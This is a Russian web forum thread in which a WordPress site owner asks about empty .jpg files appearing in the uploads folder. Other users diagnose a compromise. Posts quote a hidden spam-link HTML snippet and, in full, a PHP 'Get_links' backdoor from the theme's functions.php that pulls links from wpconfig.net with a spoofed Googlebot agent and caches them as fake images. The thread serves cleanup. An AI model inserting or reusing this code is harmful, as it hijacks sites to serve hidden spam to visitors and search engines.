X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> WordPress File Monitor: кое-что не могу понять
DarkZo5m
DarkZo5m
Topic Starter сообщение 4.7.2013, 1:26; Ответить: DarkZo5m
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 619
Регистрация: 18.10.2009
Из: :бу: :шкА
Поблагодарили: 181 раз
Репутация:   34  


Всем привет! У меня на WP сайте стоит плагин WordPress File Monitor. Он присылает ежедневно отчёт о том, какие файлы удалились, добавились или изменились. Так, в каждом отчёте есть строки о том, что были изменены файлы:

wp-content/uploads/2013/dfc946e0b0ce2cdda5d2b09935efe4e3.jpg
wp-content/uploads/2013/9cb98b1d4a45bcd7377dca2b8cdb9745.jpg

Если пройти по ссылке вида сайт.ру/wp-content/uploads/2013/dfc946e0b0ce2cdda5d2b09935efe4e3.jpg, то выдаётся сообщение, что изображение не может быть показано, так как содержит ошибки.

В директории uploads лежит на данный момент 12 файлов с подобными именами, размер каждого - 0 байт, они пустые.

Файлы создались самостоятельно и в разные дни.

Может быть, кто-нибудь знает, что это за гадя и как её вылечить?


--------------------
Продаю готовый рерайт, а также делаю рерайт на заказ.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RSmile
RSmile
сообщение 4.7.2013, 1:40; Ответить: RSmile
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 496
Регистрация: 2.11.2012
Из: Brest
Поблагодарили: 204 раза
Репутация:   32  


Шелл залит) Нотепадом этот файл откройте и посмотрите его) А может с темой залит, смотреть надо. Удаляйте и ищите вредоносный код. Обычно в функшн.рхр

Сообщение отредактировал RSmile - 4.7.2013, 1:41


--------------------
Безлимитный SSD-Хостинг. Рекомендую! Месяц бесплатно!


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DarkZo5m
DarkZo5m
Topic Starter сообщение 4.7.2013, 1:55; Ответить: DarkZo5m
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 619
Регистрация: 18.10.2009
Из: :бу: :шкА
Поблагодарили: 181 раз
Репутация:   34  


(RSmile @ 4.7.2013, 2:40) *
Нотепадом этот файл откройте и посмотрите его)

Так открыл уже все файлы, написал же, они пустые.

И с темой тоже не лились.


--------------------
Продаю готовый рерайт, а также делаю рерайт на заказ.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RSmile
RSmile
сообщение 4.7.2013, 2:14; Ответить: RSmile
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 496
Регистрация: 2.11.2012
Из: Brest
Поблагодарили: 204 раза
Репутация:   32  


Причём тут пустые? Потом через шелл они наполнятся
Вот пример кода который встречается в файлах

<!-- wp-templates.ru/rules правила ссылки >> --> <div id="posts"> Простые, интересные и умные <a href="http://timedead.ru/">флешки</a> </div><noindex><style>#posts{position:absolute;left:-1960px;}</style></noindex>


Сообщение отредактировал RSmile - 4.7.2013, 2:21


--------------------
Безлимитный SSD-Хостинг. Рекомендую! Месяц бесплатно!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DarkZo5m
DarkZo5m
Topic Starter сообщение 4.7.2013, 2:25; Ответить: DarkZo5m
Сообщение #5


Завсегдатай
*****

Группа: Active User
Сообщений: 619
Регистрация: 18.10.2009
Из: :бу: :шкА
Поблагодарили: 181 раз
Репутация:   34  


(RSmile @ 4.7.2013, 3:14) *
Скачайте Notepad++ и им откройте этот "пустой" файл.

Скачал Notepad++, открыл им этот пустой файл и, не поверите, он оказался пустым. В чём тогда может быть дело?


--------------------
Продаю готовый рерайт, а также делаю рерайт на заказ.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RSmile
RSmile
сообщение 4.7.2013, 14:01; Ответить: RSmile
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 496
Регистрация: 2.11.2012
Из: Brest
Поблагодарили: 204 раза
Репутация:   32  


Ну ок, тогда ждите пометки от Яндекса. Я же русским языком написал, что это пока они пустые, потом заполнятся кодом. Ищите вредоносный код. Он может быть где угодно. Для начала начните с файлов темы. Это не так трудно.


--------------------
Безлимитный SSD-Хостинг. Рекомендую! Месяц бесплатно!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HeavyHell
HeavyHell
сообщение 4.7.2013, 14:42; Ответить: HeavyHell
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 392
Регистрация: 26.12.2008
Поблагодарили: 95 раз
Репутация:   26  


DarkZo5m, рассказать почему RSmile столь уверенно вам пытается объяснить?
Менее недели назад мы один его сайт от этой бяки чистили... Даже не знаю, есть ли смысл создавать тему коль не слушаете советов тех, кто с этим сталкивался biggrin.gif


--------------------


Поблагодарили: (2)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
SeoFirma
SeoFirma
сообщение 4.7.2013, 22:25; Ответить: SeoFirma
Сообщение #8


Новичок
*

Группа: User
Сообщений: 42
Регистрация: 9.6.2012
Поблагодарили: 12 раз
Репутация:   5  


DarkZo5m, у Вас какая-то гадость в файлах темы, плагинов или движка. Это дырка, через которую пытаются что-то залить.

RSmile Вам написал пример кода, в данном случае, это скорее всего тоже взлом был. Ему таким образом вставляли невидимые для посетителей сайта ссылки.

Первым делом, советую пересмотреть файлы темы, если разбираетесь в коде. А вообще, лучше переустановить движок с нуля, может еще где зараза есть. Ну и код темы смотреть обязательно.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 6.7.2013, 1:22; Ответить: kagtus
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 419
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


ищите в файлах шаблона вставку с таким началом
<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

var $host = 'wpconfig.net';
var $path = '/system.php';
var $_cache_lifetime = 21600;
var $_socket_timeout = 5;


сегодня удалял такое, вставка была в wp-content/themes/тема/functions.php
спамила в wp-content/uploads/2013

Сообщение отредактировал kagtus - 6.7.2013, 1:25


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DarkZo5m
DarkZo5m
Topic Starter сообщение 7.7.2013, 14:51; Ответить: DarkZo5m
Сообщение #10


Завсегдатай
*****

Группа: Active User
Сообщений: 619
Регистрация: 18.10.2009
Из: :бу: :шкА
Поблагодарили: 181 раз
Репутация:   34  


Хм, и правда, была гадя на сайте. В общем, у кого такая же проблема, открываем functions.php темы и удаляем оттуда следующий код:

<?php error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2013/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
?>


--------------------
Продаю готовый рерайт, а также делаю рерайт на заказ.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Что лучше, фриланс, удаленка, или работа в офисе солидной компании?
129 Levizar 14365 Сегодня, 8:56
автор: wanessa
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыСайт о Туризме Wordpress
4 tbr82 647 19.5.2018, 19:53
автор: 1da1
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыПошив одежды - что не так с сайтом ?
63 bridge8 7037 18.5.2018, 19:33
автор: bridge8
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыЧто вы делаете, когда лень работать?
69 Zoya83 3349 18.5.2018, 18:32
автор: Chezarius
Открытая тема (нет новых ответов) Русификация шаблонов и плагинов WordPress
0 Dizer7 224 18.5.2018, 17:35
автор: Dizer7


 



RSS Текстовая версия Сейчас: 21.5.2018, 12:52
Дизайн